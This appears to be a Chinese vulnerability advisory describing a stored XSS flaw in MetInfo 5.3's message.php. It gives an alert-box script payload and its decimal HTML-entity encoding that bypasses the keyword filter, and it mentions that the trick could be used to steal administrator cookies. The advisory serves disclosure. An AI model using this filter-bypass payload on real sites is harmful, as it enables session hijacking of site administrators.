MetInfo 5.3 \message\message.php 存储型 XSS 漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

MetInfo5.3,从官网下的最新安装包之后,在自己的服务器上面搭建之后正式开始测试 首先来看问题页面 MetInfo5.3\message\message.php 这个文件里面 ```php if(!$Captcha->CheckCode($code)){ echo("<script type='text/javascript'> alert('$lang_membercode'); window.history.back();</script>"); exit; ``` 该段代码里面去除了SCRIPT关键字,所以当我们直接提交的时候 用户提交那块会直接清空,管理员则是去除关键字 ![](https://images.seebug.org/contribute/ba2111a6-18c9-4375-a3a7-04ada63ec835-1.png) 现在我们触发该存储XSS 测试过程: ``` <script>alert('test')</script> ``` 我们将该测试xss进行编码 编码方式为HTML实体(DEC) ``` &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#116;&#101;&#115;&#116;&#39;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62; ``` 编码之后的内容 然后我们在留言处进行留言 后台就收到了该留言 ![](https://images.seebug.org/contribute/0e7c0c75-74eb-4987-8fcf-ff22981ae031-2.png) 经过审核之后 我们在前台看一下 ![](https://images.seebug.org/contribute/63e22602-2436-4a29-9ab9-c150231edc01-3.png) 同理,当我们进行打后台管理的COOKIES的时候我们只需要将代码进行HTML实体(dec)的编码...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息